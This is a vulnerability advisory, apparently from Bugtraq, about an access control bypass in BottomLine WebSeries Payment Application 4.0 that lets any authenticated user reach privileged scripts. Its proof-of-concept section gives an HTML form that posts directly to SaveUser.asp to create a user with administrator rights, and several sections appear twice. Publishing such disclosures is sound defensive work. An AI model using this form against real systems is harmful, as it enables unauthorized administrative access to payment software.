BottomLine Webseries Payment Application Access Control Bypass Vulnerability
BID:12216
Info
BottomLine Webseries Payment Application Access Control Bypass Vulnerability
| Bugtraq ID: | 12216 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2005 12:00AM |
| Updated: | Jan 10 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to "Paul J Docherty" <[email protected]>. |
| Vulnerable: |
BottomLine WebSeries Payment Application 4.0 |
| Not Vulnerable: | |
Discussion
BottomLine Webseries Payment Application Access Control Bypass Vulnerability
BottomLine Webseries Payment Application is reported prone to an access control bypass vulnerability. It is reported that any authenticated user may access all of the privileged and restricted scripts by requesting the scripts directly using a URI.
BottomLine Webseries Payment Application is reported prone to an access control bypass vulnerability. It is reported that any authenticated user may access all of the privileged and restricted scripts by requesting the scripts directly using a URI.
Exploit / POC
BottomLine Webseries Payment Application Access Control Bypass Vulnerability
No exploit is required, the following example is available:
<html>
<body>
<h1>Add User</h1>
<hr>
<form action="http://www.example.com/wsapp/SaveUser.asp" method="post">
Action <input name="Action" value="ADD" type="text"><br>
UserID <input type="text" name="UserID"><br>
UserName <input type="text" name="UserName"><br>
Password 1 <input type="text" name="Password1"><br>
Password 2 <input type="text" name="Password2"><br>
Email <input type="text" name="EMail"><br>
Administrator <input type="checkbox" name=Admin value=1><br>
Application User <input type="checkbox" name=AppUser value=1><br>
User Group <input type="text" name="SelUserGroup" value="111" ><br>
Security Group <input type="text" name="SecurityGroup" value="RegMgr"><br>
<input type="submit" value="submit">
</form>
</html>
No exploit is required, the following example is available:
<html>
<body>
<h1>Add User</h1>
<hr>
<form action="http://www.example.com/wsapp/SaveUser.asp" method="post">
Action <input name="Action" value="ADD" type="text"><br>
UserID <input type="text" name="UserID"><br>
UserName <input type="text" name="UserName"><br>
Password 1 <input type="text" name="Password1"><br>
Password 2 <input type="text" name="Password2"><br>
Email <input type="text" name="EMail"><br>
Administrator <input type="checkbox" name=Admin value=1><br>
Application User <input type="checkbox" name=AppUser value=1><br>
User Group <input type="text" name="SelUserGroup" value="111" ><br>
Security Group <input type="text" name="SecurityGroup" value="RegMgr"><br>
<input type="submit" value="submit">
</form>
</html>
Solution / Fix
BottomLine Webseries Payment Application Access Control Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
BottomLine Webseries Payment Application Access Control Bypass Vulnerability
References:
References:
- WebSeries Homepage (Bottomline Technologies)
- Portcullis Advisory 05-001 Update, Webseries Payment Application ("Paul J Docherty"
) - Portcullis Security Advisory 05-001 ("Paul J Docherty"
)